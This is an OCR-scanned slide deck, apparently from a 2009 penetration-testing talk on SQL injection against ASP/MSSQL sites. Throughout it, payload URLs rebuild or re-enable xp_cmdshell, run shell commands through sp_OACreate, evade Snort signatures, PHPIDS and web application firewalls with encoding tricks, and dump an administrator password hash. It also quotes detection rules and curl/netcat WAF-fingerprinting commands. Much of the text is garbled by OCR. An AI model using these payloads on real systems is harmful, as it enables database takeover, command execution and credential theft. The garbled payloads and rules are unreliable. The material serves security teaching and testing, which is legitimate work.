1;exec master..sp_dropextendedproc "xp_cmdsheM"; , )&a=1 

http://[site]/page.asp?id=1;select * from OPENROWSETfSQLOLEDBVVsaVjOeVselect 
1;DECLARE ©result int,@OLEResult int,@RunResult int,@ShelllD int EXECUTE 
@OLEResult=sp_OACreate "WScript.Sheir^ShelllD OUT IF @OLEResult<>0 SELECT 
@result=@OLEResult IF @OLEResult<>0 RAISERROR("CreateObject %0X", 
14,1,@OLEResult) EXECUTE @OLEResult=sp_OAMethod @ShelllD, ,, Run ,, ,Null, ,, ping -n 8 
127.0.0.1",0,1IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0 
RAISERROR ("Run %0X",14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy 
@ShelllD');&a=1 

Remember to correctly identify the backend version as this step because MS SQL 2000 
handle this differently than MS SQL 2005 
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Privilege Escalation 



Step 3: Recreate the xp_cmdshell stored procedure (What's really going on?) 

select * from OPENROWSET( , SQLOLEDB , ,"; , sa , ; , j0e , , , select 1; 

DECLARE ©result int,@OLEResult int,@RunResult int,@ShelllD int 

EXECUTE @OLEResult=sp_OACreate "WScript.SheH",@ShelllD OUT IF @OLEResult<>0 

SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR( ,, CreateObject%0X ,, ,14,1,@OLEResult) 

EXECUTE @OLEResult=sp_OAMethod @ShelllD, ,, Run ,, ,Null,"ping -n 8 127.0.0.1 ",0,1 IF @OLEResult<>0 

SELECT @result=@OLEResult IF @OLEResult<>0 

RAISERROR ("Run %0X",14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy @ShelllD");&a=1 
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Privilege Escalation 



Step 3: Recreate the xp_cmdshell stored procedure 

MSSQL Server 2005 (re-enabling xp_cmdshell) 

http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB',";'sa';'j0e','select 
1;exec master..sp_configure "show advanced options", 1;reconfigure;exec 
master.. sp_configure "xp_cmdshell",1 ;reconfigure')&a=1 



http://[site]/page.asp?id=1;exec master.. sp_configure 'show advanced options', 
1;reconfigure;exec master..sp_configure 'ole automation procedures',1;reconfigure;&a=1 
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Not Getting Caught 
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Filter Evasion 



I know that people often think this stuff is very black and white, cut and dry - but the 
simple truth with sql injection is sometimes you just have a gut feeling that you are 
looking at a vulnerable page. 

You've tried a bunch of things but for some reason nothing seems to be working. You 
may be facing some sort of filtering. Maybe the developer has attempted to stop sql 
injection by only allowing alphanumeric characters as input. 
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Client-Side Filtering 



The first thing that we want to do is determine if the filtering is client-side (ex: being 
done with javascript). 

View source code and look for any parameters being passed to the website that 
may be filtered with javascript/vbscript and remove them 

- Save the page locally and remove offending javascript/vbscript 

or 

- Use a local proxy (ex: Paros, Webscarab, Burp Suite) 
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Restrictive Blacklist 



Server-side Alphanumeric Filter 

http://[site]/page.asp?id=2 or 1 like 1 

Here we are doing an "or true," although this time we are using the "like" 
comparison instead of the "=" sign. We can use this same technique for the other 
variants such as "and 1 like 1" or "and 1 like 2" 

http://[site]/page.asp?id=2 and 1 like 1 
http://[site]/page.asp?id=2 and 1 like 2 
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Signature Based IDS 



The key to IDS/IPS evasion is knowing that there is one in place. 

With an IPS you can use something like Active Filter Detection or you can try something 
REALLY noisy from another IP address to see if your IP gets blocked. 

Depending of the scope of your engagement you may or may not really be able to identify 
when an IDS is in use because it's passive in nature. 

I've honestly found this side of the house to be more proof-of-concept, and just having 
fun as opposed to something I've actually needed on assessments. 
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Signature Based IDS (1) 

Signature 1 

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection attempt"; 

flow: to_server, established; content: "' or 1=1 --"; nocase; sid: 1; rev:1;) 

Bypass Techniques: 
http://[site]/page.asp?id=2 or 2=2-- 
http://[site]/page.asp?id=2 or K2-- 
http://[site]/page.asp?id=2 or 1 like 1-- 
http://[site]/page.asp?id=2 /**/or 1**121**1=1**12- 
....c'mon everyone name some more 

Signature Negatives 

- Having the ' in the signature will cause you to miss attacks that don't utilize the ' 
- 1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1<2, etc) 
If this signature is so easily bypassed, what is it actually good for? 

Answer: 

It's great for automated tools and kiddies 
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Signature Based IDS (My Opinion) 
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Signature Based IDS (2) 

Signature 2 

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection attempt"; 

flow: to_server, established; pcre: "/(and|or) 1=1 (\-\-|\A*|\#)/i"; sid: 1; rev:2;) 

Bypass Techniques: 

http://[site]/page.asp?id=2 or 2=2%2D%2D 
http://[site]/page.asp?id=2 or 1<2%2D%2D 
http://[site]/page.asp?id=2 or 1 like 1%2D%2D 
http://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2%2D%2D 
....c'mon everyone name some more 

Signature Negatives 

- 1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1<2, etc) 

- Comments like pretty much anything else can be represented in other encoding type 
(ex: (%2D%2D = --) 

- It is possible to attack an sql injection vulnerability without using comments 
If this signature is so easily bypassed, what is it actually good for? 

Answer: 

Again, it's great for automated tools and kiddies 
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Signature Based IDS (3-5) 

Signature 3-5 w \ / 

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection SELECT 
statement"; flow: to_server, established; pcre:"/select.*from.*(\-\-|\/\*|\#)/i"; sid: 2; rev: 1;) 

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection UNION 
statement"; flow: to_server, established; pcre:"/union.*(\-\-|\A*|\#)/i"; sid: 3; rev: 1;) 

Bypass Techniques: 

http://[site]/page.asp?id=2 or 2 in (%73%65%6C%65%63%74%20%75%73%65%72)%2D%2D 
http://[site]/page.asp?id=2 or 2 in (select user)- 

http://[site]/page.asp?id=-2%55%4E%49%4F%4E%20%41%4C%4C%20%73%65%6C%65%63%74%201,2,3,(%73%65%6C 
%65%63%74%20%75%73%65%72),5,6,7%2D%2D 

http://[site]/page.asp?id=-2 UNION ALL select 1,2,3,(select user),5,6,7- 
....c'mon everyone name some more 

Signature Negatives 

-Although sigs 3-5 are much better, they don't consider the attacker may use different encoding types such as hex 
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Signature Based IDS (6-7) 

Signature 6 

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection SELECT statement"; flow: to_server, 

established; pcre:"/(s|%73)(e|%65)(l|%6C)(e|%65)(c|%63)(t|%74).*(f|%66)(r|%72)(o|%6F)(m|%6D).*(\-\-|\/\*|\#)/i"; sid: 2; rev2;) 



Signature 7 

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection SELECT statement"; flow: to_server, 
established; pcre:"/(s|%73|%53)(e|%65|%45)(l|%6C|%4C)(e|%65|%45)(c|%63|%43)(t|%74|%45).*(f|%66|%46)(r|%72|%52)(o| 
%6F|%4F)(m|%6D|%4D).*(\-\-|\/\*|\#)/i"; sid: 2; rev: 3;) 

At least signature 7 takes into account case sensitivity with hex encoding. 

But 

There are always other encoding types that the attacker can use... 
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Practice Your Kung Fu: PHPIDS 



PHPIDS 

WEB APPLICATION SECURITY 2.0 
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f ound injection: ' or 1 in convert (int ( select user) = 1 — 

rule: ( ? : = \s *\d * \.\d *\?\d * \.\d * ) | (? : [ | Efc] j 2 , >\s * " ) | ( ? : !\d + \.\d *\? " > | Q 
rule-description: Detects common XSS concetena Hon patterns 2/2 
impact: 4 



rule: (?: —[--An ] * $ ) I (? : \< ! - I — > ) I ( ? : \/\ * I \* \/> I ( ? : < ? : [\ W \d ] * | -- | -[ )$ ) | 
rule-description: Detects common comment types 
impact: 3 



o 



rule: (?:\\x(?:23|27|3d))|(?: 



*\\".+ (7<l\\)")|(7:(7:^["\\] > 



rule-description: Detects classic SQL injection probings 1/2 
impact: 6 



4\w\5"-]+(7< = a nd\s)(7<| 



rule: ( ? : "\s * \* . + (? : o r | id )\ W * " \d ) | ( ? : \^" ) |(7 
rule-description: Detects c/assic SQL injection probings 2/2 
impact: 6 

rule: (? : \( { 2 , >\+ ■[ 2 , > : ■£ a , >) | (? : \C{ 2 , >\+ -£2 , > : + ) K? : \(-£ 3 , >\+ + : ■£ E , >) I <? : \ | 
rule-description: Detects unknown attack vectors based on PHPIDS Centrifuge detection 
impact: 7 

PHPIDS Centrifuge data 

ratio 
3.3 

threshold 
3.49 

Overall impact: 26 



aPHP 

^^T WEB APPLICATION S 
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Index News Downloads FAQ Forum Demo Trac Contacts C 
Smoketest 



or 1 in (select user))- 



□ Harm less HTML is allowed 
Lj Input is ISON encoded 



Send 



found injection: ' or 1 in (select user)) 



rule: (?: — [-\n]*$) | (?:\< !-|— > ) |(?:\A lt< IVV) K?: (?: L\W\d]# | — K)$) |(?: V{3 J >.*$) | 
rul e -descripti on : Detects co rrtrrto n comment types 
i rn p act: 3 



rule: (?: \\x( ?: 23 1 27 |3d)) |(?: - . ?"$) |(? : - . nV' ■ +(?< I\\)") I (?: ( ?: A ["\\]*(?: [W ]+ | [^ 
rule-description: Detects classic SQL injection probings 1/2 
impact: 6 

rule: (?: "\s*y*. + (?: or|id)\W*"\cT) | (?:V"-") |(?: ^[\w\s"->K?< =and\s)(?< =or\s)(?< = 
rul e -descripti on : Detects classic SQL injection probings 2/2 
i rn pact: 6 

rule: (?:\(-[2,>\+-[2 J >: -C2,» |(?:\({2,}\+{2,}: +) |(?:\(-C3,>\++: JjZ.Y) |(?:\$\[! I !\]) 
rule-description: Detects unknown attack vectors based on PHPIDS Centrifuge detection 
impact: 7 



PHPIDS Centrifuge data 

rati o 
2.875 
threshold 
3.49 

Overall impact: 22 
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Practice Your Kung Fu: PHPIDS 
^PHPI 

m ^r WEB APPUCATION SI 




SECURTTY 2.0 



Index News Downloads FAQ Forum Derno Trac Contact Si. t 

Smoketest 



%27%20or 1 in (select user))%2D%2D 



I I Harmless HTML is allowed 

I — I Input is JSON encoded 



nd 



Nothing suspicious was found! 

HTML injection %2 7%2 0or 1 in (select user))%2D%2D 

a href and onclick doubleguoted click 
a href and onclick single quoted click 
a href and on I click no quotes click 

script taqs 
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Signature Based IDS 



The real trick for each of these techniques is to understand that this is just like IDS 
evasion in the service based exploitation side of the house. 

You have to make sure that your attack actually works. It's easy to bypass an IDS, but 
you can just as easily end up with your attack bypassing the IDS, but not working at all. 

With this in mind you can mix/match the IDS evasion tricks - it's just a matter of 
understanding the regex in use. 

http://[site]/page.asp?id=2%20or%202%20in%20(/*IDS*/%73/*evasion*/%65/*is*/ 

%6C/*easy*/%65/*just*/%63/*ask*/%74/*j0e*/%20%75/*to*/%73/*teach*/%65/*you*/ 
%72/*how*/)%2D%2D 

What is passed to the db 
http://[site]/page.asp?id=2 or 2 in (select user)-- 

in comments ("IDS evasion is easy just ask jOe to teach you how") 
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Identifying Web Application Firewalls 

WAFs are surprisingly easy to detect? 

Generally you just have to send 1 valid request, and one malicious request and diff the response. 

Malicious tends to be any HTTP request that has a payload that contains things like: 



■ " *" O # I A * 



< ? # 
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Identifying Wei 

How can you determine if the target hi 

Curl 

curl -i http://targetcompany.com/cmd.exe | < 

Netcat 

$ (echo "GET /cmd.exe HTTP/1.1"; echo "Host: targetcompat 
If the server responds with error code "501 Method Not 

Curl 

curl -i http://www.targetcompany.com/%27 

HTTP/1.1 999 No Hacking 

Server: WWW Server/1.1 


b Application Firewalls 

ost has deployed a WAF? 
grep "501 Method" 

iy.com"; echo) | nc targetcompany.com | grep "501 Method Not Implemented" 
Implemented" then it is running mod_security. 

WebKnight Application Firewall Alert 

Your request triggered an alert! If you feel that you have 
received this page in error, please contact the administrator of 
this wen site. 

What is WebKnight? 

AQTRONIX WebKnight is an application firewall for web servers 
and is released under the GNU General Public License. It is an 
ISAPI filter for securing web servers by blocking certain requests. 
If an alert is triggered WebKnight will take over and protect the 
web server. 


For more information on WebKnight: 
http:ffwww.aqtronix.comJWebKniciht.' 

AQTRONIX WebKnight 
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Identifying Web Application Firewalls 

How can you determine if the target host has deployed a WAF? 

Gary O'Leary-Steele 
http://packetstormsecurity.org/web/unicode-fun.txt 

[jOe@LinuxLaptop toolz]$ ruby unicode-fun.rb 

Enter string to URL Unicode:<script>alert('XSS')</script> 

%u003c%uff53%uff43%uff52%uff49%uff50%uff54%u003e%uff41%uff4c%uff45%uff52%uff 

54%uff08%u02b9%uff38%uff33%uff33%u02b9%uff09%u003c%u2215%uff53%uff43%uff52 

%uff49%uff50%uff54%u003e 

Curl 

curl -i http://www.targetcompany.com/3c%73%63%72%69%70%74%3e%61 %6c 

%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3e 

HTTP/1.1 404 Not Found 

Date: Sat, 14 Mar 2009 19:13:10 GMT 

Server: Apache 
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Identifying Web Application Firewalls 

How can you determine if the target host has deployed a WAF? 

Curl 

curl -i http://www.targetcompany.com/3c%73%63%72%69%70%74%3e%61 %6c 

%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3e 

HTTP/1.1 200 Condition Intercepted 

Date: Sun, 15 Mar 2009 01:42:01 GMT 

Server: Apache 
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DotNet Defender WAF 



■MBI.WaPIM.IBJ!JJ.tJ.IIIJ e IJ.IIIJ=J 



._]□]_><] 



File Edit View History Bookmarks Tools Help 



• e x 



I C3 I http:/fl 



irnain .asp?goto= <script >alert('x;^") </scrjpb >&pid=3 



<uf ~ | E3H Google 



Most Visited 9fl Getting Started Latest Headlines 



lS-Mar-09 



dot Defender Blocked Your Request 



Please contact the site administrator, and provide the following 
Reference ID: 

7391-5D9B-AD44-078B 



dotDefender™ Web Application Firewall 

dotDefender is a software-based web application firewall installed on Apache, 
IIS, or Microsoft ISA Server. 

Download a fully-featured 30 days trial version from: 
http;//www.applicure.corn/?paqe = d otD efen d e r 



w 
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Bypassing DotNet Defender 



Jnj2<] 



File Edit View History Bookmarks Tools Help 



C UL, | C3 |http:/fl 



|rnain.asp?goto= 



|.aspB^=l or 1 in (select user)— &pid= 



t> - |[eH Goc "3 |e 



|ja| Most Visited (^ Getting Started ,.^_ Latest Headlines 



5» Acunetix Web Scanner (Free Edition) i Start Scan - ■ Abort Scan Settings i^J Advanced t Scanner status: Idle 




Microsoft OLE DB Provider for ODBC Drivers error B0040e07' 

[Microsoft][ODBC SQL Server Driver][SQL ServerJConversion failed when converting the nvarchar value 'dbo' to data 

type int. 

/CUSScripts.asp, line 1659 



\Sj\ 
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DotNet Defender 



"■"" 
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File 


Edit 


View History 
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Tools 


Help 




















m~ 


) 


- C X 


JL, 1 C3 
















|E3- 


Google 


>"■ 



£_ Most Visited ^r^ Getting Started Latest Headlines 




Microsoft OLE DB Provider for ODBC Drivers error S0040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 
9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 

(Build 3790: Service Pack 2) 'to data type int. 

/CUSScripts.asp, line 1732 
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Dumping Admin PW - sorry DotNet Defender 



UWIMM 



_ |g| x| 



File Edit View History Bookmarks Tools Help 



-ex 



r^ 



■^1 or 1 in (select master .dbo.Fn_varbintohe>: \J T I |Cj| "" Google 



£Z. Most Visited 1& Getting Started Latest Headlines 




Microsoft OLE DB Provider for ODBC Drivers error B0040e07" 

[rv1icrosoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 
0x01 004086 cebOtB 141 be37de72b10050c2dcd746e96c8at6a05b3" to data type int. 

/CUSScripts.asp, line 1732 



IsjI 
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Basic References 



SQL Tutorials: 

http://www.sql-tutorial.net/ 

SQL Injection Tutorials 

http://www.securitydocs.com/library/3587 

http://www.astalavista. com/index. php?section=docsys&cmd=details&id=42 

SQL Injection Cheatsheets: 

http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/ 
http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/ 
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References For This Presentation 



Lots, and lots, and lots of late nights with rum and coke at my side... 

Paul Battista's ToorCon 9 Presentation 

http://www.securityexperimentxom/se/documents/Overlooked%20SQL%20lnjection%2020071 021.pdf 

Brad Warneck's GCIA Paper 

http://www.giac.org/certified_professionals/practicals/gcia/1231.php 
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Holla @ Me.... 



You want the presentation????? Buy me a rum and coke or email me. 

You can contact me at: 

Email: joe@learnsecurityonline.com 

Twitter: http://twitter.com/jOemccray 

Linkedln: http://www.linkedin.com/in/joemccray 



